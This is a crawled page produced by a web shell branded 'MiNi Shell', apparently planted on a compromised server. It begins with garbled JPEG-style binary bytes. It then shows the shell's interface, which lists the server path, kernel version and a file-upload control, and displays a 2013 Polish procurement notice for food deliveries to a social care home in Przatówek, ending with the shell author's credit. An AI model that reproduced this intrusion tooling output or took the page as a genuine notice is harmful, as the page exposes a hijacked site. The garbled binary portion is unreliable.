JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131212/515774-N-2013.html

<p class="kh_header"><b>Szadek: Zakup i dostawy różnych artykułów spożywczych, ryb oraz przetworów rybnych , mrożonych warzyw i owoców dla Domu Pomocy Społecznej w Przatówku,
Przatówek 1, 98-240 Szadek</b><br>
<b>Numer ogłoszenia: 515774 - 2013; data zamieszczenia: 12.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Przatówek 1, 98-240 Szadek, woj. łódzkie, tel. 43 675 12 29, faks 43 675 12 29.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka pomocy społecznej powiatu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawy różnych artykułów spożywczych, ryb oraz przetworów rybnych , mrożonych warzyw i owoców dla Domu Pomocy Społecznej w Przatówku,
Przatówek 1, 98-240 Szadek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy:
Zakupu i dostawy różnych artykułów spożywczych, ryb i przetworów rybnych, mrożonych warzyw i owoców dla Domu Pomocy Społecznej w Przatówku Przatówek 1, 98-240 Szadek.
Oznaczenie zadania za pomocą Wspólnego Słownika Zamówień (CPV): 
Część pierwsza.
Różne produkty spożywcze 15800000-6 
Część druga.
Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone 15240000-2
Ryby mrożone, filety rybne i pozostałe mięso ryb 15220000-6
Część trzecia
Mrożone warzywa i owoce 15331170-9

2. Artykuły spożywcze, stanowiące przedmiot zamówienia muszą w pochodzić z bieżącej produkcji oraz utrzymywać ustalone standardy jakościowe.
3. a) Zamawiający dopuszcza zmiany ilości asortymentu będącego przedmiotem zamówienia /zakresu zamówienia/ w przypadku konieczności  zmniejszenia ilości zamawianego asortymentu stosownie do potrzeb Zamawiającego , jednak nie więcej niż 20 % wartości asortymentu objętego umową, z zastrzeżeniem pkt 3 b)
b) Zamawiający dopuszcza zmiany ilości poszczególnych rodzajów asortymentów, określonych w odrębnych częściach zamówienia w ten sposób, że Zamawiający może dokonać zmniejszenia ilości jednego asortymentu i zwiększenia ilości innego asortymentu pod warunkiem, że zachowana jest stałość cen wszystkich asortymentów objętych umową przez cały okres jej obowiązywania, oraz pod warunkiem, że łączna wartość wszystkich zamówionych asortymentów nie przekroczy wartości umowy.
4. Pracownik Domu Pomocy Społecznej w Przatówku odpowiedzialny za składanie zamówień, zamawia ilości asortymentu potrzebne w określonych dniach tygodnia. Zamówienie sporządzane jest w formie pisemnej i przesyłane do realizującego faksem, pocztą elektroniczną, w ustalony
z Wykonawcą dzień tygodnia. W uzasadnionych przypadkach dopuszcza się możliwość stosowania zamówienia telefonicznego.
5. Wykonawca dowozi zamówioną na dany dzień ilość asortymentu do siedziby zamawiającego swoim środkiem transportu i na własny koszt w godzinach od: 700 - 1300.
6. Płatności za zamówiony towar dokonuje się przelewem w terminie 14 dni po otrzymaniu faktury. Wykonawca wystawia i doręcza Zamawiającemu fakturę za towar, najpóźniej dwa dni po jego dostarczeniu.
7. Wybór Wykonawcy nastąpi po zapoznaniu się z dokumentacją przetargową oferentów.
8. W wyborze ofert istotną będzie cena na wyszczególnione w poniższych tabelach artykuły:
Część pierwsza.
Różne produkty spożywcze
L.P.
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
1
Ananasy w puszce
2,50 kg
2
Aromaty do ciasta 5 g
90 szt.
3
Barszcz biały
90 l
4
Barszczyk czerwony koncentrat
2 l
5
Biszkopty okrągłe
40,00 kg
6
Brzoskwinie puszka
5,00 kg
7
Budynie
85,00 kg
8
Bułka tarta
110,00 kg
9
Chrzan
20,00 kg
10
Ciastka herbatniki
12,00 kg
11
Ciastka luzem
85,00 kg
12
Cukier
1 950,00 kg
13
Cukier puder
45,00 kg
14
Cukier waniliowy
11,00 kg
15
Cukierki czekoladowe luzem
110,00 kg
16
Cynamon
1,00 kg
17
Drożdże
20,00 kg
18
Dżem brzoskwiniowy, minimum 35 g owocu na 100 g produktu
45,00 kg
19
Dżem truskawkowy, minimum 35 g owocu na 100 g produktu
120,00 kg
20
Dżem wiśniowy, minimum 35 g owocu na 100 g produktu
120,00 kg
21
Dżem z czarnej porzeczki, minimum 35 g owocu na 100 g produktu
45,00 kg
22
Galaretki owocowe
50,00 kg
23
Groszek konserwowy
70,00 kg
24
Herbata expresowa
0,3 kg
25
Herbata granulowana
45,00 kg
26
Jajka - wielkość L
20 000 szt
27
Kakao
6,00 kg
28
Kasza manna
110,00 kg
29
Kawa naturalna mielona
1,50 kg
30
Kawa naturalna rozpuszczalna
2, 00 kg
31
Kawa rozpuszczalna zbożowa
50,00 kg
32
Ketchup łagodny, minimum 163 g pomidorów na 100 g produktu
60,00 kg
33
Kisiel
100,00 kg
34
Kleik ryżowy
14,00 kg
35
Kompot owocowy 0,9 l
1450 szt
36
Koncentrat pomidorowy 30%
60 ,00 kg
37
Kostka rosołowa
150 szt
38
Kostka mięsna
200 szt
39
Krakersy
60,00 kg
40
Kukurydza konserwowa
2,00 kg
41
Kwasek cytrynowy
5,00 kg
42
Liście laurowe
1,00 kg
43
Majeranek
3,00 kg
44
Majonez
55,00 kg
45
Mak
21,00 kg
46
Makaron nitki
100,00 kg
47
Makaron świderki
500,00 kg
48
Margaryna Palma
40,00 kg
49
Margaryna zwykła
30,00 kg
50
Marmolada
10,00 kg
51
Masło roślinne
45,00 kg
52
Mąka pszenna - typ 480
1150,00 kg
53
Mąka pszenna tortowa
120,00 kg
54
Mąka ziemniaczana
60,00 kg
55
Migdały płatki
0,20 kg
56
Miód naturalny wielokwiatowy
10,00 kg
57
Miód sztuczny
3,00 kg
58
Mleko pełne w proszku
100,00 kg
59
Mleko skondensowane
2,00 kg
60
Musztarda
43,00 kg
61
Nać pietruszki - suszona
0,50 kg
62
Ocet
40 l
63
Ogórki konserwowe 0,9 l
3 szt
64
Olej rzepakowy
 200,00 l
65
Orzechy włoskie
0,80 kg
66
Paluszki słone
20,00 kg
67
Papryka konserwowa 0,9 l
100 szt
68
Papryka mielona ostra
0,50 kg
69
Papryka mielona słodka
2,00 kg
70
Pieprz mielony
5,00 kg
71
Pieprz ziarnisty
3,00 kg
72
Pierogi z kapustą i grzybami, serem
5, 00 kg
73
Płatki kukurydziane
85,00 kg
74
Płatki owsiane
40,00 kg
75
Polewy do ciast 100 g
30 szt
76
Proszek do pieczenia
1,50 kg
77
Przecier ogórkowy
35,00 kg
78
Przecier szczawiowy
25,00 kg
79
Przyprawa do bigosu
0,50 kg
80
Przyprawa do flaków
1,00 kg
81
Przyprawa do kiszonych ogórków
3,50 kg
82
Przyprawa do kurczaka
1,00 kg
83
Przyprawa do piernika
0,80 kg
84
Przyprawa grilowa
0,25 kg
85
Przyprawa w płynie
70 l
86
Przyprawa warzywna
27,00 kg
87
Rodzynki
6,50 kg
88
Ryż
400,00 kg
89
Serki topione
180,00 kg
90
Smalec
50,00 kg
91
Soda spożywcza
2,00 kg
92
Sos pieczeniowy ciemny 27 g
100 szt
93
Sos sałatkowy koperkowy 9 g
30 szt
94
Sos sałatkowy ziołowy 9 g
30 szt
95
Sos sałatkowy czosnkowy 9 g
30 szt
96
Sól jodowana
366,00 kg
97
Suchary delikatesowe
65,00 kg
98
Susz owocowy
2,00 kg
99
Syrop owocowy
300 l
100
Śmietanka fix
1,00 kg
101
Wafle luzem
80,00 kg
102
Wafel do lodu - mały kubek
1500 szt
103
Wiórki kokosowe
1,50 kg
104
Ziele angielskie
1,60 kg
105
Żelatyna spożywcza
4,00 kg


Część druga.
Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone
Ryby mrożone, filety rybne i pozostałe mięso ryb
L.p
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
1
Filet z miruny
370,00 kg
2
Filet śledziowy
80,00 kg
3
Koreczki rybne
60,00 kg
4
Kotlety rybne
120,00 kg
5
Makrela wędzona
65,00 kg
6
Moskaliki
60,00 kg
7
Paluszki rybne
100,00 kg
8
Paprykarz szczeciński
110,00 kg
9
Ryby w pomidorach
110,00 kg
10
Sałatka śledziowa
61,00 kg
11
Śledź po kaszubsku
1,00 kg
12
Tuńczyk w sosie własnym
0,6 kg

Część trzecia
Mrożone warzywa i owoce

L.p
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
1
Brokuł mrożony
 20 00 kg
2
Fasolka mrożona /zielona/
 20 00 kg
3
Kalafior mrożony
 20 00 kg
4
Mieszanka kompotowa mrożona
 20 00 kg
5
Truskawki mrożone
 50 00 kg
6
Warzywa mrożone - 4 składnikowe
100,00 kg
7
Warzywa mrożone na patelnię
 50,00 kg

V. Termin realizacji zamówienia:
				od 01.01.2014r. do 31.12.2014r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.24.00.00-2, 15.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy PZP, Wykonawca przedkłada oświadczenie o spełnieniu warunków udziału w postępowaniu załącznik nr 2 do SIWZ pn: Oświadczenie art. 22 PZP wraz z aktualnym odpisem z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy PZP, Wykonawca przedkłada oświadczenie o spełnieniu warunków udziału w postępowaniu załącznik nr 2 do SIWZ pn: Oświadczenie art. 22 PZP</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy PZP, Wykonawca przedkłada oświadczenie o spełnieniu warunków udziału w postępowaniu załącznik nr 2 do SIWZ pn: Oświadczenie art. 22 PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy PZP, Wykonawca przedkłada oświadczenie o spełnieniu warunków udziału w postępowaniu załącznik nr 2 do SIWZ pn: Oświadczenie art. 22 PZP</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy PZP, Wykonawca przedkłada oświadczenie o spełnieniu warunków udziału w postępowaniu załącznik nr 2 do SIWZ pn: Oświadczenie art. 22 PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość zmiany istotnych postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru zgodnie z warunkami:
a) w zakresie zmiany wynagrodzenia (ceny podanej w ofercie) w przypadku zmiany stawek podatku VAT;
b) w zakresie zmiany ilości asortymentu będącego przedmiotem zamówienia (zakresu zamówienia) w przypadku konieczności zmniejszenia ilości zamawianego asortymentu, stosownie do potrzeb Zamawiającego, jednak nie więcej niż 20 % wartości asortymentu objętego niniejszą umową, z zastrzeżeniem litery c.
c) w zakresie zmiany ilości poszczególnych rodzajów asortymentów, określonych                            w poszczególnych pakietach w ten sposób, że Zamawiający może dokonać zmniejszenia ilości jednego asortymentu i zwiększenia ilości innego asortymentu pod warunkiem, że zachowana jest stałość cen wszystkich asortymentów objętych niniejszą umową przez cały okres jej obowiązywania, oraz pod warunkiem, że łączna wartość wszystkich zamówionych asortymentów nie przekroczy wartości przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dpsprzatowek.pl/index.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Przatówku
Przatówek 1
98-240 Szadek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2013 godzina 08:30, miejsce: Dom Pomocy Społecznej w Przatówku
Przatówek 1
98-240 Szadek sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com